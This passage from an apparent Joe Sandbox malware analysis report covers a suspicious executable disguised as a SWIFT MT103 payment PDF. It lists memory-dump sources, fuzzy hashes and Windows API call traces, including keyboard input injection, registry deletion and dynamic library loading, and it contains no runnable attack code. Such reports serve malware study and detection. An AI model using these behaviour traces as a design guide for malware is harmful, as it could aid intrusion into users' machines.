                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$_wcslen
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 763830540-1403004172
                                                        • Opcode ID: ccd382a428d3e6981e51983d28521b710ca2c784d942a7be8e5a7b43120e41ce
                                                        • Instruction ID: 8c71ebf423f389569590ff88e643f185c263fd61562863516bde62979c95be4e
                                                        • Opcode Fuzzy Hash: ccd382a428d3e6981e51983d28521b710ca2c784d942a7be8e5a7b43120e41ce
                                                        • Instruction Fuzzy Hash: E0210C7160020067C210BB3A9C46FAF77989B85364F09052FF959AB3D1EA7CE94A436E
                                                        APIs
                                                        • GetStdHandle.KERNEL32(?), ref: 004439B4
                                                          • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,74DF2EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                                                          • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                                                          • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: CurrentHandleProcess$Duplicate
                                                        • String ID: nul
                                                        • API String ID: 2124370227-2873401336
                                                        • Opcode ID: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                                                        • Instruction ID: e5202fea31d744cc2812a948a395a4146b23d8233fafbd02014e3d546f800e0b
                                                        • Opcode Fuzzy Hash: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                                                        • Instruction Fuzzy Hash: 8921A070104301ABE320DF28D886B9B77E4AF94B24F504E1EF9D4972D1E3B5DA54CBA6
                                                        APIs
                                                        • GetStdHandle.KERNEL32(000000F6), ref: 004438B7
                                                          • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,74DF2EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                                                          • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                                                          • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: CurrentHandleProcess$Duplicate
                                                        • String ID: nul
                                                        • API String ID: 2124370227-2873401336
                                                        • Opcode ID: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                                                        • Instruction ID: 183321404fa0000a7fb955016a75d3ae5bd0bbc3c7f5d4043dd6f74a8503dfc6
                                                        • Opcode Fuzzy Hash: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                                                        • Instruction Fuzzy Hash: 4E2182701002019BE210DF28DC45F9BB7E4AF54B34F204A1EF9E4962D0E7759654CB56
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00441333
                                                        • LoadLibraryW.KERNEL32(?,?,?,?,0047B4D0,?,?,?,?,?,?,?,?,?,00000000), ref: 0044133A
                                                        • SendMessageW.USER32(?,00000467,00000000,?), ref: 00441352
                                                        • DestroyWindow.USER32(00000000,?,00000467,00000000,?,?,?,?,0047B4D0,?,?,?,?,?,?), ref: 0044135B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$DestroyLibraryLoadWindow
                                                        • String ID: SysAnimate32
                                                        • API String ID: 3529120543-1011021900
                                                        • Opcode ID: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
                                                        • Instruction ID: 28effd0bdeb99d0e0a50349a2d6ccdc4655b9339127a2247ff1827a793b197f6
                                                        • Opcode Fuzzy Hash: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
                                                        • Instruction Fuzzy Hash: D0216271204301ABF7209AA5DC84F6B73ECEBD9724F104A1EF651D72E0D6B4DC818729
                                                        APIs
                                                        • PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000001), ref: 0044304E
                                                        • TranslateMessage.USER32(?), ref: 0044308B
                                                        • DispatchMessageW.USER32(?), ref: 00443096
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004430AD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Message$Peek$DispatchTranslate
                                                        • String ID: *.*
                                                        • API String ID: 1795658109-438819550
                                                        • Opcode ID: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                                                        • Instruction ID: a39ada88e739a490af96418dc0f35d82e94fc94c1e76e22fe960a83301852fb1
                                                        • Opcode Fuzzy Hash: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                                                        • Instruction Fuzzy Hash: 9F2138715183419EF720DF289C80FA3B7949B60B05F008ABFF66492191E6B99608C76E
                                                        APIs
                                                          • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                          • Part of subcall function 004389A1: SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                                                          • Part of subcall function 004389A1: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                                                          • Part of subcall function 004389A1: GetCurrentThreadId.KERNEL32 ref: 004389DA
                                                          • Part of subcall function 004389A1: AttachThreadInput.USER32(00000000), ref: 004389E1
                                                        • GetFocus.USER32 ref: 004609EF
                                                          • Part of subcall function 004389EB: GetParent.USER32(?), ref: 004389F7
                                                          • Part of subcall function 004389EB: GetParent.USER32(?), ref: 00438A04
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00460A37
                                                        • EnumChildWindows.USER32(?,00445A31,?), ref: 00460A60
                                                        • __swprintf.LIBCMT ref: 00460A7A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_wcslen
                                                        • String ID: %s%d
                                                        • API String ID: 991886796-1110647743
                                                        • Opcode ID: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                                                        • Instruction ID: 20a4aa43144560c0524e92d1094e5dcb4402c89d1d481f65a72662ac57dae138
                                                        • Opcode Fuzzy Hash: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                                                        • Instruction Fuzzy Hash: 7521A4712403046BD610FB65DC8AFEFB7ACAF98704F00481FF559A7181EAB8A509877A
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: _memset$_sprintf
                                                        • String ID: %02X
                                                        • API String ID: 891462717-436463671
                                                        • Opcode ID: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
                                                        • Instruction ID: c3235ccac5cd273424cb9b73a8b9e0f10e05fa8943de770f4571b5c3e9b76774
                                                        • Opcode Fuzzy Hash: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
                                                        • Instruction Fuzzy Hash: 5B11E97225021167D314FA698C93BEE724CAB45704F50453FF541A75C1EF6CB558839E
                                                        APIs
                                                        • _memset.LIBCMT ref: 0042CD00
                                                        • GetOpenFileNameW.COMDLG32 ref: 0042CD51
                                                          • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exe,?,C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exe,004A8E80,C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exe,0040F3D2), ref: 0040FFCA
                                                          • Part of subcall function 00410130: SHGetMalloc.SHELL32(00000000), ref: 0041013A
                                                          • Part of subcall function 00410130: SHGetDesktopFolder.SHELL32(?,004A8E80), ref: 00410150
                                                          • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 00410160
                                                          • Part of subcall function 00410130: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410197
                                                          • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 004101AC
                                                          • Part of subcall function 00410020: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 00410037
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: NamePath$Full_wcscpy$DesktopFileFolderFromListMallocOpen_memset
                                                        • String ID: $OH$@OH$X
                                                        • API String ID: 3491138722-1394974532
                                                        • Opcode ID: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                                                        • Instruction ID: e3e81f3fa603e1d093c5df9e9287f390c0398a0e5563e0e16fb911f44c5f658a
                                                        • Opcode Fuzzy Hash: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                                                        • Instruction Fuzzy Hash: 2111C2B02043405BC311EF19984175FBBE9AFD5308F14882EF68497292D7FD854DCB9A
                                                        APIs
                                                        • LoadLibraryW.KERNEL32(00000000), ref: 00463DD1
                                                        • GetProcAddress.KERNEL32(?,?), ref: 00463E68
                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 00463E84
                                                        • GetProcAddress.KERNEL32(?,?), ref: 00463ECE
                                                        • FreeLibrary.KERNEL32(?,?,?,00000000,?), ref: 00463EF0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$Library$FreeLoad
                                                        • String ID:
                                                        • API String ID: 2449869053-0
                                                        • Opcode ID: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                                                        • Instruction ID: 5a5949aabc30296464acd143044f95cbdcafad8a77d2d24e7d672d776762960f
                                                        • Opcode Fuzzy Hash: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                                                        • Instruction Fuzzy Hash: 9051C1752043409FC300EF25C881A5BB7A4FF89305F00456EF945A73A2DB79EE45CBAA
                                                        APIs
                                                        • GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C3DA
                                                        • SetKeyboardState.USER32(00000080), ref: 0044C3ED
                                                        • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C441
                                                        • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C465
                                                        • SendInput.USER32 ref: 0044C509
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: KeyboardMessagePostState$InputSend
                                                        • String ID:
                                                        • API String ID: 3031425849-0
                                                        • Opcode ID: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                                                        • Instruction ID: f46f63d78903415e516a46676784f6fcea1caa301ceb581e17347d916cd8316d
                                                        • Opcode Fuzzy Hash: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                                                        • Instruction Fuzzy Hash: DB413B715462446FF760AB24D944BBFBB94AF99324F04061FF9D4122C2D37D9908C77A
                                                        APIs
                                                        • RegEnumKeyExW.ADVAPI32 ref: 004422F0
                                                        • RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 0044232B
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0044234E
                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00442390
                                                        • RegEnumKeyExW.ADVAPI32(?,00000000), ref: 004423C0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Enum$CloseDeleteOpen
                                                        • String ID:
                                                        • API String ID: 2095303065-0
                                                        • Opcode ID: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
                                                        • Instruction ID: 24d8057b763805d248a02a33893b377b1579bd56aab3fff97e90bb3d062a49ad
                                                        • Opcode Fuzzy Hash: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
                                                        • Instruction Fuzzy Hash: 0C3150721043056EE210DF94DD84FBF73ECEBC9314F44492EBA9596141D7B8E9098B6A
                                                        APIs
                                                        • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C2F4
                                                        • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C31B
                                                        • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C363
                                                        • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C385
                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C392
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: PrivateProfile$SectionWrite$String
                                                        • String ID:
                                                        • API String ID: 2832842796-0
                                                        • Opcode ID: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                                                        • Instruction ID: eb365ed5c03c4bb3a44f9ddbc5128f2f56e5f8affd5b6ace934fe40af23b551f
                                                        • Opcode Fuzzy Hash: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                                                        • Instruction Fuzzy Hash: 00318675240305ABD610DFA1DC85F9BB3A8AF84705F00891DF94497292D7B9E889CB94
                                                        APIs
                                                        • GetClientRect.USER32(?,?), ref: 00447997
                                                        • GetCursorPos.USER32(?), ref: 004479A2
                                                        • ScreenToClient.USER32(?,?), ref: 004479BE
                                                        • WindowFromPoint.USER32(?,?), ref: 004479FF
                                                        • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447A78
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Client$CursorFromPointProcRectScreenWindow
                                                        • String ID:
                                                        • API String ID: 1822080540-0
                                                        • Opcode ID: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                                                        • Instruction ID: e9c1e18ea4fcc9a2ad4b32cd349e8b57ec7287094a91df3c43d19f1875151664
                                                        • Opcode Fuzzy Hash: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                                                        • Instruction Fuzzy Hash: DE3188742082029BD710CF19D88596FB7A9EBC8714F144A1EF88097291D778EA57CBAA
                                                        APIs
                                                        • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                        • ScreenToClient.USER32(?,?), ref: 00447C39
                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                        • EndPaint.USER32(?,?), ref: 00447CD1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                        • String ID:
                                                        • API String ID: 659298297-0
                                                        • Opcode ID: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                                        • Instruction ID: 653bb342b0117225c29b14224c0e663a7b864e912777eddc33bb147bcfad3e12
                                                        • Opcode Fuzzy Hash: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                                        • Instruction Fuzzy Hash: 8A3150706043019FE320CF15D9C8F7B7BE8EB89724F044A6EF994873A1D774A8468B69
                                                        APIs
                                                        • GetCursorPos.USER32(?), ref: 004478A7
                                                        • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478C3
                                                        • DefDlgProcW.USER32(?,0000007B,?,?,004A83D8,?,004A83D8,?), ref: 004478E7
                                                        • GetCursorPos.USER32(?), ref: 00447935
                                                        • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 0044795B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: CursorMenuPopupTrack$Proc
                                                        • String ID:
                                                        • API String ID: 1300944170-0
                                                        • Opcode ID: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                                        • Instruction ID: 600148c7f6f0e64f7aba5c2d0a58757112576a5c49d56a392ea253be37485a5b
                                                        • Opcode Fuzzy Hash: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                                        • Instruction Fuzzy Hash: 2B31E475244204ABE214DB48DC48FABB7A5FBC9711F14491EF64483390D7B96C4BC779
                                                        APIs
                                                        • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                        • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                        • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                        • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                        • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                          • Part of subcall function 004413F0: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                                          • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                                          • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441493
                                                          • Part of subcall function 004413F0: SendMessageW.USER32(02F51B00,000000F1,00000000,00000000), ref: 004414C6
                                                          • Part of subcall function 004413F0: SendMessageW.USER32(02F51B00,000000F1,00000001,00000000), ref: 004414F1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
